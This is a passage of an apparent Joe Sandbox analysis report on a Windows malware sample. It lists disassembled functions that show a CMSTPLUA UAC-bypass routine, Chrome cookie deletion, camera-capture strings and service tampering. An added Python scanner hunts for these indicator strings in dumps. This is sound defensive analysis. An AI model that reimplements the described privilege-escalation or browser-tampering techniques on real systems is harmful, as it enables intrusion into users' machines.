                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                          • String ID: tMG
                                          • API String ID: 1356121797-30866661
                                          • Opcode ID: a32bf82f151408e5f3abe306aa4422ab47744250154bd8f7e0bff8bea5466356
                                          • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                          • Opcode Fuzzy Hash: a32bf82f151408e5f3abe306aa4422ab47744250154bd8f7e0bff8bea5466356
                                          • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                          APIs
                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                          • _free.LIBCMT ref: 00450FC8
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450FD3
                                          • _free.LIBCMT ref: 00450FDE
                                          • _free.LIBCMT ref: 00451032
                                          • _free.LIBCMT ref: 0045103D
                                          • _free.LIBCMT ref: 00451048
                                          • _free.LIBCMT ref: 00451053
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                          • int.LIBCPMT ref: 004111BE
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                          • String ID: 8mG
                                          • API String ID: 2536120697-3990007011
                                          • Opcode ID: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                          • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                          • Opcode Fuzzy Hash: 14799048d37b477e6c40f7e8d4f0e89b1ed2b05bcd10956721a24fc1261bb2b4
                                          • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                          APIs
                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe), ref: 0040760B
                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          • CoUninitialize.OLE32 ref: 00407664
                                          Strings
                                          • C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, xrefs: 004075EB, 004075EE, 00407640
                                          • [+] before ShellExec, xrefs: 0040762C
                                          • [+] ShellExec success, xrefs: 00407649
                                          • [+] ucmCMLuaUtilShellExecMethod, xrefs: 004075F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeObjectUninitialize_wcslen
                                          • String ID: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                          • API String ID: 3851391207-1143468238
                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                          • GetLastError.KERNEL32 ref: 0040BB22
                                          Strings
                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                          • UserProfile, xrefs: 0040BAE8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 2018770650-304995407
                                          • Opcode ID: 7bdd53de2c7ce75327e0ce8a061dea47c63620c1b54bd56443db715df27270fd
                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                          • Opcode Fuzzy Hash: 7bdd53de2c7ce75327e0ce8a061dea47c63620c1b54bd56443db715df27270fd
                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
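The two function blocks above (the ucmCMLuaUtilShellExecMethod log lines at 004075F0..00407649 and the Chrome Cookies wipe at 0040BAE3..0040BB48) give a responder exact strings to pivot on when this sample, or an unpacked region of it, shows up on another host. The scanner below is an added example, not code from the Joe Sandbox report or from the analysed binary. It looks for those strings in both their ANSI and their UTF-16LE form, because the sample mixes A- and W-suffixed APIs (DeleteFileA here, OpenSCManagerW further down) and the same literal can sit in memory either way, and it reports a capability only when more than one of its strings is present, so a file that merely names the Chrome profile path does not trigger it. The SAMPLE buffer is constructed for the demonstration and is not a dump of this binary.

```python
"""Scan a sample or unpacked memory region for the capability strings listed
in the two disassembly blocks above.  Added triage helper; not code from the
Joe Sandbox report or from the analysed binary."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Indicator strings copied verbatim from the report's "Strings" sections.
INDICATORS = {
    "uac_bypass_cmstplua": [
        "[+] ucmCMLuaUtilShellExecMethod",
        "[+] before ShellExec",
        "[+] ShellExec success",
    ],
    "chrome_cookie_wipe": [
        r"\AppData\Local\Google\Chrome\User Data\Default\Cookies",
        "[Chrome Cookies found, cleared!]",
        "[Chrome Cookies not found]",
    ],
}

# Both byte encodings are tried: the sample calls DeleteFileA (ANSI) but also
# W-suffixed APIs, so the same literal may be stored as UTF-16LE elsewhere.
ENCODINGS = {"ascii": "ascii", "utf-16le": "utf-16-le"}


@dataclass(frozen=True)
class Hit:
    capability: str
    indicator: str
    offset: int
    encoding: str


def scan(blob: bytes) -> list[Hit]:
    """Return every indicator occurrence in blob, ordered by offset."""
    hits: list[Hit] = []
    for capability, needles in INDICATORS.items():
        for needle in needles:
            for label, codec in ENCODINGS.items():
                pattern = re.escape(needle.encode(codec))
                for m in re.finditer(pattern, blob):
                    hits.append(Hit(capability, needle, m.start(), label))
    return sorted(hits, key=lambda h: (h.offset, h.indicator))


def capabilities(blob: bytes, min_hits: int = 2) -> list[str]:
    """Capabilities whose indicator count reaches min_hits.  Requiring more
    than one string keeps a lone match on the generic profile path from
    flagging a benign browser helper."""
    counts: dict[str, int] = {}
    for h in scan(blob):
        counts[h.capability] = counts.get(h.capability, 0) + 1
    return sorted(c for c, n in counts.items() if n >= min_hits)


# Constructed test buffer (not a dump of the analysed file): the indicator
# strings NUL-terminated between filler bytes, one of them stored as UTF-16LE.
SAMPLE = (
    b"\x00" * 16
    + b"[+] ucmCMLuaUtilShellExecMethod\x00"
    + b"[+] before ShellExec\x00[+] ShellExec success\x00"
    + b"UserProfile\x00"
    + rb"\AppData\Local\Google\Chrome\User Data\Default\Cookies" + b"\x00"
    + "[Chrome Cookies found, cleared!]".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"0x{h.offset:06x} {h.encoding:<8} {h.capability:<20} {h.indicator}")
    print("capabilities:", capabilities(SAMPLE))
```

Run it against the decoded .exe or against the process memory dumps listed under Memory Dump Source; the offsets it prints for the real file should line up with the xrefs the report gives (004075F0, 0040BAE3 and so on, relative to the 00400000 image base).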
                                          APIs
                                          • _free.LIBCMT ref: 00444106
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00444118
                                          • _free.LIBCMT ref: 0044412B
                                          • _free.LIBCMT ref: 0044413C
                                          • _free.LIBCMT ref: 0044414D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID: 0ce
                                          • API String ID: 776569668-2820837681
                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                          APIs
                                          • __allrem.LIBCMT ref: 0043ACE9
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                          • __allrem.LIBCMT ref: 0043AD1C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                          • __allrem.LIBCMT ref: 0043AD51
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                          APIs
                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleep
                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                          • API String ID: 3469354165-985523790
                                          • Opcode ID: 07df79d1def3ea8d0f0114adccc6152b0d50d4d25af5b96514c935137a49def7
                                          • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                          • Opcode Fuzzy Hash: 07df79d1def3ea8d0f0114adccc6152b0d50d4d25af5b96514c935137a49def7
                                          • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                          APIs
                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                          • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                          • String ID:
                                          • API String ID: 3950776272-0
                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                          • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID:
                                          • API String ID: 493672254-0
                                          • Opcode ID: 305a945f5ae16c96e2f06c84d41aa4012af85c485f9c974a0b1ca90fe9e389de
                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                          • Opcode Fuzzy Hash: 305a945f5ae16c96e2f06c84d41aa4012af85c485f9c974a0b1ca90fe9e389de
                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                          APIs
                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                          • _free.LIBCMT ref: 004482CC
                                          • _free.LIBCMT ref: 004482F4
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                          • _abort.LIBCMT ref: 00448313
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
